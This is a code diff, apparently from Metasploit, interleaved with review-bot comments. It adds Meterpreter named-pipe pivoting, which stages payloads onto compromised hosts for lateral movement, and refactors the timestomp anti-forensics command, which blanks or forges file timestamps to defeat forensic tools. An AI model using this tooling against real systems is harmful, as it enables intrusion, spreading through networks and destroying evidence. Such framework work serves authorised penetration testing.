@@ -157,13 +157,28 @@ module PacketDispatcher # # Sends a packet without waiting for a response. # - def send_packet(packet, completion_routine = nil, completion_param = nil) - if (completion_routine) - add_response_waiter(packet, completion_routine, completion_param) + def send_packet(packet, opts={}) + if self.pivot_session + opts[:session_guid] = self.session_guid + opts[:tlv_enc_key] = self.tlv_enc_key + return self.pivot_session.send_packet(packet, opts) + end + + if opts[:completion_routine] + add_response_waiter(packet, opts[:completion_routine], opts[:completion_param]) + end + + session_guid = self.session_guid + tlv_enc_key = self.tlv_enc_key + + # if a session guid is provided, use all the details provided + if opts[:session_guid] + session_guid = opts[:session_guid] + tlv_enc_key = opts[:tlv_enc_key] end bytes = 0 - raw = packet.to_r(self.session_guid, self.tlv_enc_key) + raw = packet.to_r(session_guid, tlv_enc_key) err = nil # Short-circuit send when using a passive dispatcher @@ -289,6 +304,24 @@ module PacketDispatcher # Reception # ## + + def pivot_keepalive_start + return unless self.send_keepalives + self.receiver_thread = Rex::ThreadFactory.spawn("PivotKeepalive", false) do + while self.alive + begin + Rex::sleep(PING_TIME) + keepalive + rescue ::Exception => e + dlog("Exception caught in pivot keepalive: #{e.class}: #{e}", 'meterpreter', LEV_1) + dlog("Call stack: #{e.backtrace.join("\n")}", 'meterpreter', LEV_2) + self.alive = false + break + end + end + end + end + # # Monitors the PacketDispatcher's sock for data in its own # thread context and parsers all inbound packets. @@ -298,6 +331,9 @@ module PacketDispatcher # Skip if we are using a passive dispatcher return if self.passive_service + # redirect to pivot keepalive if we're a pivot session + return pivot_keepalive_start if self.pivot_session + self.comm_mutex = ::Mutex.new self.waiters = [] 
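Review bot: `send_packet(packet, opts={})` changes the public signature from positional `(packet, completion_routine, completion_param)` to an options hash, and this hunk shows no call sites being updated; a caller still passing a Proc positionally would have it bound to `opts`, and `opts[:completion_routine]` would then invoke the proc with a symbol instead of looking up a key — please confirm every caller was converted in this commit. When `self.pivot_session` is set the method also writes `opts[:session_guid]` and `opts[:tlv_enc_key]` into the caller's hash before forwarding, an observable mutation; `opts = opts.merge(session_guid: self.session_guid, tlv_enc_key: self.tlv_enc_key)` keeps the caller's hash intact. The `# if a session guid is provided, use all the details provided` branch takes `opts[:tlv_enc_key]` unconditionally, so a caller supplying a guid but no key sends without AES (per the `if key && key[:key]` test in `Packet#to_r`); a comment such as `# callers passing :session_guid must also pass :tlv_enc_key, a nil key disables encryption` makes that contract explicit.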
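Review bot: `pivot_keepalive_start` rescues `::Exception`, which also traps `SystemExit`/`Interrupt`-class exceptions raised in the keepalive thread and converts them into `self.alive = false`; `rescue ::StandardError => e` is the conventional scope unless there is a deliberate reason to swallow everything here — if the existing monitor thread in this file already uses the wider form, match it knowingly rather than by default. The method is also the only one in the Reception section without a header comment; `# Stands in for monitor_socket on a pivoted session: there is no socket of its own to read, so only send periodic keepalives through the pivot` explains why it reuses `receiver_thread` (the redirect is visible in the following hunk).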
@@ -370,7 +406,7 @@ module PacketDispatcher backlog.each do |pkt| begin - if ! dispatch_inbound_packet(pkt) + unless dispatch_inbound_packet(pkt) # Keep Packets in the receive queue until a handler is registered # for them. Packets will live in the receive queue for up to # PACKET_TIMEOUT seconds, after which they will be dropped. @@ -427,10 +463,9 @@ module PacketDispatcher def receive_packet packet = parser.recv(self.sock) if packet - packet.from_r(self.tlv_enc_key) - if self.session_guid == '00000000-0000-0000-0000-000000000000' - parts = packet.session_guid.unpack('H*')[0] - self.session_guid = [parts[0, 8], parts[8, 4], parts[12, 4], parts[16, 4], parts[20, 12]].join('-') + packet.parse_header! + if self.session_guid == NULL_GUID + self.session_guid = packet.session_guid.dup end end packet @@ -440,12 +475,12 @@ module PacketDispatcher # Stop the monitor # def monitor_stop - if(self.receiver_thread) + if self.receiver_thread self.receiver_thread.kill self.receiver_thread = nil end - if(self.dispatcher_thread) + if self.dispatcher_thread self.dispatcher_thread.kill self.dispatcher_thread = nil end @@ -461,6 +496,10 @@ module PacketDispatcher # Adds a waiter association with the supplied request packet. # def add_response_waiter(request, completion_routine = nil, completion_param = nil) + if self.pivot_session + return self.pivot_session.add_response_waiter(request, completion_routine, completion_param) + end + waiter = PacketResponseWaiter.new(request.rid, completion_routine, completion_param) self.waiters << waiter @@ -473,6 +512,10 @@ module PacketDispatcher # if anyone. # def notify_response_waiter(response) + if self.pivot_session + return self.pivot_session.notify_response_waiter(response) + end + handled = false self.waiters.each() { |waiter| if (waiter.waiting_for?(response)) 
@@ -489,7 +532,11 @@ module PacketDispatcher # Removes a waiter from the list of waiters. # def remove_response_waiter(waiter) - self.waiters.delete(waiter) + if self.pivot_session + self.pivot_session.remove_response_waiter(waiter) + else + self.waiters.delete(waiter) + end end ## @@ -514,15 +561,21 @@ module PacketDispatcher def dispatch_inbound_packet(packet) handled = false + pivot_session = self.find_pivot_session(packet.session_guid) + + tlv_enc_key = self.tlv_enc_key + tlv_enc_key = pivot_session.pivoted_session.tlv_enc_key if pivot_session + + packet.from_r(tlv_enc_key) + # Update our last reply time self.last_checkin = Time.now + pivot_session.pivoted_session.last_checkin = self.last_checkin if pivot_session # If the packet is a response, try to notify any potential # waiters - if packet.response? - if (notify_response_waiter(packet)) - return true - end + if packet.response? && notify_response_waiter(packet) + return true end # Enumerate all of the inbound packet handlers until one handles diff --git a/lib/rex/post/meterpreter/pivot.rb b/lib/rex/post/meterpreter/pivot.rb new file mode 100644 index 0000000000..82814c8ce5 --- /dev/null +++ b/lib/rex/post/meterpreter/pivot.rb 
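Review bot: `packet.from_r(tlv_enc_key)` now runs inside `dispatch_inbound_packet`, and that method is re-invoked for every packet left in the backlog when no handler accepted it (the `unless dispatch_inbound_packet(pkt)` retry loop in an earlier hunk of this file), so an unhandled packet is XOR-decoded and decrypted once per retry; unless `GroupTlv#from_r` resets the TLV list first, its TLVs would also accumulate across retries — decoding once at receive time or remembering on the packet that the body has been decoded avoids both. The decryption key is selected from the session GUID in the XOR-only header, so a packet carrying a known pivoted session's GUID is decrypted with that session's key; a one-line comment, `# the header GUID selects which session's key decrypts the body`, would make that routing decision obvious to the next reader. The method body continues past the end of the hunk.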
@@ -0,0 +1,163 @@ +# -*- coding: binary -*- + +require 'rex/post/meterpreter/inbound_packet_handler' +require 'securerandom' + +module Rex +module Post +module Meterpreter + +class PivotListener + attr_accessor :id + + attr_accessor :session_class + + attr_accessor :url + + attr_accessor :stage + + def initialize(session_class, url, stage) + self.id = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') + self.session_class = session_class + self.url = url + self.stage = stage + end + + def to_row + [self.id.unpack('H*')[0], url, stage] + end +end + +class Pivot + + # + # The associated meterpreter client instance + # + attr_accessor :client + + attr_accessor :pivoted_session + + # Class modifications to support global pivot message + # dispatching without having to register a per-instance handler + class << self + include Rex::Post::Meterpreter::InboundPacketHandler + + # Class request handler for all channels that dispatches requests + # to the appropriate class instance's DIO handler + def request_handler(client, packet) + if packet.method == 'core_pivot_session_new' + session_guid = packet.get_tlv_value(TLV_TYPE_SESSION_GUID) + listener_id = packet.get_tlv_value(TLV_TYPE_PIVOT_ID) + client.add_pivot_session(Pivot.new(client, session_guid, listener_id)) + elsif packet.method == 'core_pivot_session_died' + session_guid = packet.get_tlv_value(TLV_TYPE_SESSION_GUID) + pivot = client.find_pivot_session(session_guid) + if pivot + pivot.pivoted_session.kill('Died') + client.remove_pivot_session(session_guid) + end + end + true + end + end + + def Pivot.get_listeners(client) + client.pivot_listeners + end + + def Pivot.remove_listener(client, listener_id) + if client.find_pivot_listener(listener_id) + request = Packet.create_request('core_pivot_remove') + request.add_tlv(TLV_TYPE_PIVOT_ID, listener_id) + client.send_request(request) + client.remove_pivot_listener(listener_id) + end + end + + def Pivot.create_named_pipe_listener(client, opts={}) + request = 
Packet.create_request('core_pivot_add') + request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name]) + + # TODO: use the framework to generate the whole lot, including a session type + c = Class.new(::Msf::Payload) + c.include(::Msf::Payload::Stager) + c.include(::Msf::Payload::TransportConfig) + + # TODO: add more platforms + case opts[:platform] + when 'windows' + # Include the appropriate reflective dll injection module for the target process architecture... + if opts[:arch] == ARCH_X86 + c.include(::Msf::Payload::Windows::MeterpreterLoader) + elsif opts[:arch] == ARCH_X64 + c.include(::Msf::Payload::Windows::MeterpreterLoader_x64) + else + STDERR.puts("Not including a loader for '#{opts[:arch]}'\n") + end + end + + stage_opts = { + arch: opts[:arch], + force_write_handle: true, + null_session_guid: true, + datastore: { + exit_func: opts[:exit_func] || 'process', + expiration: client.expiration, + comm_timeout: client.comm_timeout, + retry_total: client.retry_total, + retry_wait: client.retry_wait, + 'PIPEHOST' => opts[:pipe_host], + 'PIPENAME' => opts[:pipe_name] + } + } + + # Create the migrate stager + stager = c.new() + + stage_opts[:transport_config] = [stager.transport_config_reverse_named_pipe(stage_opts)] + stage = stager.stage_payload(stage_opts) + + url = "pipe://#{opts[:pipe_host]}/#{opts[:pipe_name]}" + stage_config = "#{opts[:arch]}/#{opts[:platform]}" + pivot_listener = PivotListener.new(::Msf::Sessions::Meterpreter_x86_Win, url, stage_config) + + request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA, stage) + request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA_SIZE, stage.length) + request.add_tlv(TLV_TYPE_PIVOT_ID, pivot_listener.id) + + client.send_request(request) + + client.add_pivot_listener(pivot_listener) + + pivot_listener + end + + def initialize(client, session_guid, listener_id) + self.client = client + + opts = { + pivot_session: client, + session_guid: session_guid + } + + listener = client.find_pivot_listener(listener_id) + self.pivoted_session = 
listener.session_class.new(nil, opts) + + self.pivoted_session.framework = self.client.framework + self.pivoted_session.bootstrap({'AutoVerifySessionTimeout' => 30}) + self.client.framework.sessions.register(self.pivoted_session) + end + +protected + + # + # Cleans up any lingering resources + # + def cleanup + end + +end + +end; end; end + + diff --git a/lib/rex/post/meterpreter/pivot_container.rb b/lib/rex/post/meterpreter/pivot_container.rb new file mode 100644 index 0000000000..e87e5807e6 --- /dev/null +++ b/lib/rex/post/meterpreter/pivot_container.rb 
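Review bot: `Pivot#initialize` calls `listener.session_class.new(nil, opts)` without checking that `client.find_pivot_listener(listener_id)` found anything, and `listener_id` comes straight out of the remote `core_pivot_session_new` packet in `request_handler`, so an unknown or already-removed id raises NoMethodError inside the packet handler; add `raise ArgumentError, 'unknown pivot listener id' unless listener` before the `.new`. In `Pivot.create_named_pipe_listener` the session class is hard-coded to `::Msf::Sessions::Meterpreter_x86_Win` even though `opts[:arch]` may be `ARCH_X64` and the loader mixin is already picked per arch; an x64 stage should map to `::Msf::Sessions::Meterpreter_x64_Win`. The unsupported-arch path only prints to STDERR and then builds a stage with no loader mixin at all; raising or returning nil there would also be consistent with the `STDERR.puts` this same commit removes from kiwi.rb. `PivotListener` and the `Pivot.*` class methods carry no doc comments; one sentence each, e.g. `# Asks the remote side to tear down the listener, then forgets it locally` on `Pivot.remove_listener`, would bring the new file up to the level of the rest of the directory.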
@@ -0,0 +1,72 @@ +# -*- coding: binary -*- + +module Rex +module Post +module Meterpreter + +### +# +# This interface is meant to be included by things that are meant to contain +# zero or more pivot instances in the form of a hash. +# +### +module PivotContainer + + # + # Initializes the pivot association hash + # + def initialize_pivots + self.pivot_sessions = {} + self.pivot_listeners = {} + end + + # + # Adds a pivot to the container that is indexed by the pivoted + # session guid. + # + def add_pivot_session(pivot) + self.pivot_sessions[pivot.pivoted_session.session_guid] = pivot + end + + def add_pivot_listener(listener) + self.pivot_listeners[listener.id] = listener + end + + # + # Looks up a pivot instance based on its pivoted session guid. + # + def find_pivot_session(pivot_session_guid) + return self.pivot_sessions[pivot_session_guid] + end + + def find_pivot_listener(listener_id) + return self.pivot_listeners[listener_id] + end + + # + # Removes a pivot based on its pivoted session guid. + # + def remove_pivot_session(pivot_session_guid) + return self.pivot_sessions.delete(pivot_session_guid) + end + + def remove_pivot_listener(listener_id) + return self.pivot_listeners.delete(listener_id) + end + + # + # The hash of pivot sessions. + # + attr_reader :pivot_sessions + + attr_reader :pivot_listeners + +protected + + attr_writer :pivot_sessions # :nodoc: + + attr_writer :pivot_listeners # :nodoc: + +end + +end; end; end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 420430f7fd..1dc678cc67 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb 
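Review bot: `add_pivot_listener`, `find_pivot_listener` and `remove_pivot_listener` lack the header comments their `*_pivot_session` counterparts have; e.g. `# Adds a pivot listener to the container, indexed by its binary listener id` on `add_pivot_listener`, and `attr_reader :pivot_listeners` could carry `# The hash of pivot listeners keyed by listener id`. Every accessor assumes `initialize_pivots` has already run — `find_pivot_session` is called from `dispatch_inbound_packet` for every inbound packet — but nothing in this hunk shows where it is invoked, so a `# NOTE: must be called during session setup, before any packet is dispatched` on `initialize_pivots` would make the precondition explicit. The explicit `return`s in the `find_*`/`remove_*` one-liners are unnecessary and the sibling `add_*` methods already omit them.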
@@ -83,6 +83,8 @@ class Console::CommandDispatcher::Core if client.passive_service && client.sock.type? == 'tcp-ssl' c['ssl_verify'] = 'Modify the SSL certificate verification setting' end + + c['pivot'] = 'Manage pivot listeners' end if client.platform == 'windows' || client.platform == 'linux' 
@@ -119,6 +121,156 @@ class Console::CommandDispatcher::Core 'Core' end + @@pivot_opts = Rex::Parser::Arguments.new( + '-t' => [true, 'Pivot listener type'], + '-i' => [true, 'Identifier of the pivot to remove'], + '-l' => [true, 'Host address to bind to (if applicable)'], + '-n' => [true, 'Name of the listener entity (if applicable)'], + '-a' => [true, 'Architecture of the stage to generate'], + '-p' => [true, 'Platform of the stage to generate'], + '-h' => [false, 'View help'] + ) + + @@pivot_supported_archs = [ARCH_X64, ARCH_X86] + @@pivot_supported_platforms = ['windows'] + + def cmd_pivot_help + print_line('Usage: pivot [options]') + print_line + print_line('Manage pivot listeners on the target.') + print_line + print_line(@@pivot_opts.usage) + print_line + print_line('Supported pivot types:') + print_line(' - pipe (using named pipes over SMB)') + print_line('Supported arhiectures:') + @@pivot_supported_archs.each do |a| + print_line(' - ' + a) + end + print_line('Supported platforms:') + print_line(' - windows') + print_line + print_line("eg. 
pivot add -t pipe -l 192.168.0.1 -n msf-pipe -a #{@@pivot_supported_archs.first} -p windows") + print_line(" pivot list") + print_line(" pivot remove -i 1") + print_line + end + + def cmd_pivot(*args) + if args.length == 0 || args.include?('-h') + cmd_pivot_help + return true + end + + opts = {} + @@pivot_opts.parse(args) { |opt, idx, val| + case opt + when '-t' + opts[:type] = val + when '-i' + opts[:guid] = val + when '-l' + opts[:lhost] = val + when '-n' + opts[:name] = val + when '-a' + opts[:arch] = val + when '-p' + opts[:platform] = val + end + } + + # first parameter is the command + case args[0] + when 'remove', 'del', 'delete', 'rm' + unless opts[:guid] + print_error('Pivot listener ID must be specified (-i)') + return false + end + + unless opts[:guid] =~ /^[0-9a-f]{32}/i && opts[:guid].length == 32 + print_error("Invalid pivot listener ID: #{opts[:guid]}") + return false + end + + listener_id = [opts[:guid]].pack('H*') + unless client.find_pivot_listener(listener_id) + print_error("Unknown pivot listener ID: #{opts[:guid]}") + return false + end + + Pivot.remove_listener(client, listener_id) + print_good("Successfully removed pivot: #{opts[:guid]}") + when 'list', 'show', 'print' + if client.pivot_listeners.length > 0 + tbl = Rex::Text::Table.new( + 'Header' => 'Currently active pivot listeners', + 'Indent' => 4, + 'Columns' => ['Id', 'URL', 'Stage']) + + client.pivot_listeners.each do |k, v| + tbl << v.to_row + end + print_line + print_line(tbl.to_s) + else + print_status('There are no active pivot listeners') + end + when 'add' + unless opts[:type] + print_error('Pivot type must be specified (-t)') + return false + end + + unless opts[:arch] + print_error('Architecture must be specified (-a)') + return false + end + unless @@pivot_supported_archs.include?(opts[:arch]) + print_error("Unknown or unsupported architecture: #{opts[:arch]}") + return false + end + + unless opts[:platform] + print_error('Platform must be specified (-p)') + return false + end 
+ unless @@pivot_supported_platforms.include?(opts[:platform]) + print_error("Unknown or unsupported platform: #{opts[:platform]}") + return false + end + + # currently only one pivot type supported, more to come we hope + case opts[:type] + when 'pipe' + pivot_add_named_pipe(opts) + else + print_error("Unknown pivot type: #{opts[:type]}") + return false + end + else + print_error("Unknown command: #{args[0]}") + end + end + + def pivot_add_named_pipe(opts) + unless opts[:lhost] + print_error('Pipe host must be specified (-l)') + return false + end + + unless opts[:name] + print_error('Pipe name must be specified (-n)') + return false + end + + # reconfigure the opts so that they can be passed to the setup function + opts[:pipe_host] = opts[:lhost] + opts[:pipe_name] = opts[:name] + Pivot.create_named_pipe_listener(client, opts) + print_good("Successfully created #{opts[:type]} pivot.") + end + def cmd_sessions_help print_line('Usage: sessions ') print_line @@ -605,7 +757,7 @@ class Console::CommandDispatcher::Core # Arguments for transport switching # @@transport_opts = Rex::Parser::Arguments.new( - '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"], + '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"], '-l' => [true, 'LHOST parameter (for reverse transports)'], '-p' => [true, 'LPORT parameter'], '-i' => [true, 'Specify transport by index (currently supported: remove)'], diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb index 8d7ba38af4..a02d046e70 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb 
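Review bot: `print_line('Supported arhiectures:')` in `cmd_pivot_help` has a typo — `print_line('Supported architectures:')`. In `cmd_pivot` the id validation `opts[:guid] =~ /^[0-9a-f]{32}/i && opts[:guid].length == 32` only holds because of the extra length test; `unless opts[:guid] =~ /\A[0-9a-f]{32}\z/i` anchors the whole string and is the usual form for validating user-supplied input. The final `else print_error("Unknown command: #{args[0]}")` falls through returning nil while every other failure path does `return false`; add `return false` there for a consistent return value. `client.pivot_listeners.each do |k, v|` never uses `k` — `each_value` reads more clearly.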
@@ -2,141 +2,162 @@ require 'rex/post/meterpreter' module Rex -module Post -module Meterpreter -module Ui + module Post + module Meterpreter + module Ui + ### + # + # This class provides commands that interact with the timestomp feature set of + # the privilege escalation extension. + # + ### + class Console::CommandDispatcher::Priv::Timestomp + Klass = Console::CommandDispatcher::Priv::Timestomp -### -# -# This class provides commands that interact with the timestomp feature set of -# the privilege escalation extension. -# -### -class Console::CommandDispatcher::Priv::Timestomp + include Console::CommandDispatcher - Klass = Console::CommandDispatcher::Priv::Timestomp + @@timestomp_opts = Rex::Parser::Arguments.new( + "-m" => [ true, "Set the \"last written\" time of the file" ], + "-a" => [ true, "Set the \"last accessed\" time of the file" ], + "-c" => [ true, "Set the \"creation\" time of the file" ], + "-e" => [ true, "Set the \"mft entry modified\" time of the file" ], + "-z" => [ true, "Set all four attributes (MACE) of the file" ], + "-f" => [ true, "Set the MACE of attributes equal to the supplied file" ], + "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ], + "-r" => [ false, "Set the MACE timestamps recursively on a directory" ], + "-v" => [ false, "Display the UTC MACE values of the file" ], + "-h" => [ false, "Help banner" ] + ) - include Console::CommandDispatcher + # + # List of supported commands. 
+ # + def commands + { + "timestomp" => "Manipulate file MACE attributes" + } + end - @@timestomp_opts = Rex::Parser::Arguments.new( - "-m" => [ true, "Set the \"last written\" time of the file" ], - "-a" => [ true, "Set the \"last accessed\" time of the file" ], - "-c" => [ true, "Set the \"creation\" time of the file" ], - "-e" => [ true, "Set the \"mft entry modified\" time of the file" ], - "-z" => [ true, "Set all four attributes (MACE) of the file" ], - "-f" => [ true, "Set the MACE of attributes equal to the supplied file" ], - "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ], - "-r" => [ false, "Set the MACE timestamps recursively on a directory" ], - "-v" => [ false, "Display the UTC MACE values of the file" ], - "-h" => [ false, "Help banner" ]) + # + # Name for this dispatcher. + # + def name + "Priv: Timestomp" + end - # - # List of supported commands. - # - def commands - { - "timestomp" => "Manipulate file MACE attributes" - } - end + # + # This command provides the same level of features that vinnie's command + # line timestomp interface provides with a similar argument set. + # + def cmd_timestomp(*args) + paths = [] - # - # Name for this dispatcher. - # - def name - "Priv: Timestomp" - end + modified = nil + accessed = nil + creation = nil + emodified = nil - # - # This command provides the same level of features that vinnie's command - # line timestomp interface provides with a similar argument set. 
- # - def cmd_timestomp(*args) - if (args.length < 2) - print_line("\nUsage: timestomp OPTIONS file_path\n" + - @@timestomp_opts.usage) - return - end + blank_file_mace = false + blank_directory_mace = false + get_file_mace = false + help = false - file_path = nil - args.each { |a| file_path = a unless a[0] == "-" } + @@timestomp_opts.parse(args) do |opt, _idx, val| + case opt + when "-m" + modified = str_to_time(val) + when "-a" + accessed = str_to_time(val) + when "-c" + creation = str_to_time(val) + when "-e" + emodified = str_to_time(val) + when "-z" + modified = str_to_time(val) + accessed = str_to_time(val) + creation = str_to_time(val) + emodified = str_to_time(val) + when "-f" + print_status("Setting MACE attributes on #{path} from #{val}") + hash = client.priv.fs.get_file_mace(path) + if hash + modified = str_to_time(hash['Modified']) + accessed = str_to_time(hash['Accessed']) + creation = str_to_time(hash['Created']) + emodified = str_to_time(hash['Entry Modified']) + end + when "-b" + blank_file_mace = true + when "-r" + blank_directory_mace = true + when "-v" + get_file_mace = true + when "-h" + help = true + when nil + paths << val + end + end - if file_path.nil? - print_line("\nNo file_path specified.") - return - end + if paths.empty? + print_line("\nNo paths specified.") + return nil + end - args.delete(file_path) + if !(modified || accessed || creation || emodified || + blank_file_mace || blank_directory_mace || get_file_mace) || help + print_line("\nUsage: timestomp OPTIONS\n" + + @@timestomp_opts.usage) + return nil + end - modified = nil - accessed = nil - creation = nil - emodified = nil + paths.uniq.each do |path| + # If any one of the four times were specified, change them. 
+ if modified || accessed || creation || emodified + print_status("Setting specific MACE attributes on #{path}") + client.priv.fs.set_file_mace(path, modified, accessed, creation, emodified) + end - @@timestomp_opts.parse(args) { |opt, idx, val| - case opt - when "-m" - modified = str_to_time(val) - when "-a" - accessed = str_to_time(val) - when "-c" - creation = str_to_time(val) - when "-e" - emodified = str_to_time(val) - when "-z" - print_line("#{val}") - modified = str_to_time(val) - accessed = str_to_time(val) - creation = str_to_time(val) - emodified = str_to_time(val) - when "-f" - print_status("Setting MACE attributes on #{file_path} from #{val}") - client.priv.fs.set_file_mace_from_file(file_path, val) - when "-b" - print_status("Blanking file MACE attributes on #{file_path}") - client.priv.fs.blank_file_mace(file_path) - when "-r" - print_status("Blanking directory MACE attributes on #{file_path}") - client.priv.fs.blank_directory_mace(file_path) - when "-v" - hash = client.priv.fs.get_file_mace(file_path) + if blank_file_mace + print_status("Blanking file MACE attributes on #{path}") + client.priv.fs.blank_file_mace(path) + end - print_line("Modified : #{hash['Modified']}") - print_line("Accessed : #{hash['Accessed']}") - print_line("Created : #{hash['Created']}") - print_line("Entry Modified: #{hash['Entry Modified']}") - when "-h" - print_line("\nUsage: timestomp file_path OPTIONS\n" + - @@timestomp_opts.usage) - return + if blank_directory_mace + print_status("Blanking directory MACE attributes on #{path}") + client.priv.fs.blank_directory_mace(path) + end + + if get_file_mace + hash = client.priv.fs.get_file_mace(path) + print_status("Showing MACE attributes for #{path}") + print_line("Modified : #{hash['Modified']}") + print_line("Accessed : #{hash['Accessed']}") + print_line("Created : #{hash['Created']}") + print_line("Entry Modified: #{hash['Entry Modified']}") + end + end + end + + protected + + # + # Converts a date/time in the form of 
MM/DD/YYYY HH24:MI:SS + # + def str_to_time(str) # :nodoc: + unless str.nil? + _r, mon, day, year, hour, min, sec = + str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a + end + + if str.nil? || mon.nil? + raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})" + end + + Time.mktime(year, mon, day, hour, min, sec, 0) + end + end end - } - - # If any one of the four times were specified, change them. - if (modified or accessed or creation or emodified) - print_status("Setting specific MACE attributes on #{file_path}") - client.priv.fs.set_file_mace(file_path, modified, accessed, - creation, emodified) end end - -protected - - # - # Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS - # - def str_to_time(str) # :nodoc: - r, mon, day, year, hour, min, sec = str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a - - if (mon == nil) - raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})" - end - - Time.mktime(year, mon, day, hour, min, sec, 0) - end - -end - -end -end -end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 4e9e0079b2..5e7e987eda 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -894,13 +894,21 @@ class Console::CommandDispatcher::Stdapi::Sys if args.include? "-h" cmd_getprivs_help end - print_line("=" * 60) - print_line("Enabled Process Privileges") - print_line("=" * 60) + + table = Rex::Text::Table.new( + 'Header' => 'Enabled Process Privileges', + 'Indent' => 0, + 'SortIndex' => 1, + 'Columns' => ['Name'] + ) + + privs = client.sys.config.getprivs client.sys.config.getprivs.each do |priv| - print_line(" #{priv}") + table << [priv] end - print_line("") + + print_line + print_line(table.to_s) end # 
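Review bot: The new `when "-f"` branch in `cmd_timestomp` references `path` while options are still being parsed, before the `paths.uniq.each do |path|` loop exists, so `-f` raises NameError (or resolves to an unrelated `path` method) and would in any case read the MACE values from the wrong file — the old code copied them from `val`, the supplied source file. It should be `print_status("Reading MACE attributes from #{val}")` followed by `hash = client.priv.fs.get_file_mace(val)`; the target `path` is only known later when the collected values are applied inside the loop. The rest of the hunk is a re-indentation of the whole class body, which buries the functional changes and made this one easy to miss.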
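Review bot: `privs = client.sys.config.getprivs` is assigned and the very next line calls `client.sys.config.getprivs.each` again, so the session is asked for its privileges twice and `privs` is never used; iterate the saved result with `privs.each do |priv|`. The `if args.include? "-h"` branch above prints help but does not return, so `-h` still performs the remote call — pre-existing, but the duplicated call now doubles it; `return` after `cmd_getprivs_help` fixes both.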
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cb1c245860..b3c110bb1e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -191,9 +191,9 @@ class Client # Closes the connection to the remote server. # def close - if (self.conn) + if self.conn && !self.conn.closed? self.conn.shutdown - self.conn.close unless self.conn.closed? + self.conn.close end self.conn = nil diff --git a/lib/robots.rb b/lib/robots.rb new file mode 100644 index 0000000000..7959c5428a --- /dev/null +++ b/lib/robots.rb 
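Review bot: `close` now skips the whole block when the socket is already closed, but `self.conn.shutdown` can itself raise (e.g. `Errno::ENOTCONN` on a peer-reset socket), and when it does both the `close` on the next line and the `self.conn = nil` below it are skipped, leaving the socket object open and still referenced; wrapping the shutdown so that close always runs keeps the method's "connection is gone afterwards" contract.
```ruby
    if self.conn && !self.conn.closed?
      begin
        self.conn.shutdown
      ensure
        self.conn.close unless self.conn.closed?
      end
    end
    # … unchanged: self.conn = nil …
```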
@@ -0,0 +1,162 @@ +# +# Copyright (c) 2008 Kyle Maxwell, contributors +# +# Permission is hereby granted, free of charge, to any person +# obtaining a copy of this software and associated documentation +# files (the "Software"), to deal in the Software without +# restriction, including without limitation the rights to use, +# copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the +# Software is furnished to do so, subject to the following +# conditions: +# +# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. +# + +require "open-uri" +require "uri" +require "timeout" +require 'rex/logging/log_dispatcher' + +# https://github.com/fizx/robots +class Robots + DEFAULT_TIMEOUT = 3 + + # Represents a parsed robots.txt file + class ParsedRobots + def initialize(uri, user_agent) + @last_accessed = Time.at(1) + + io = Robots.get_robots_txt(uri, user_agent) + + if !io || io.content_type != "text/plain" || io.status.first != "200" + io = StringIO.new("User-agent: *\nAllow: /\n") + end + + @other = {} + @disallows = {} + @allows = {} + @delays = {} # added delays to make it work + agent = /.*/ + io.each do |line| + next if line =~ /^\s*(#.*|$)/ + arr = line.split(":") + key = arr.shift.to_s.downcase + value = arr.join(":").strip + value.strip! 
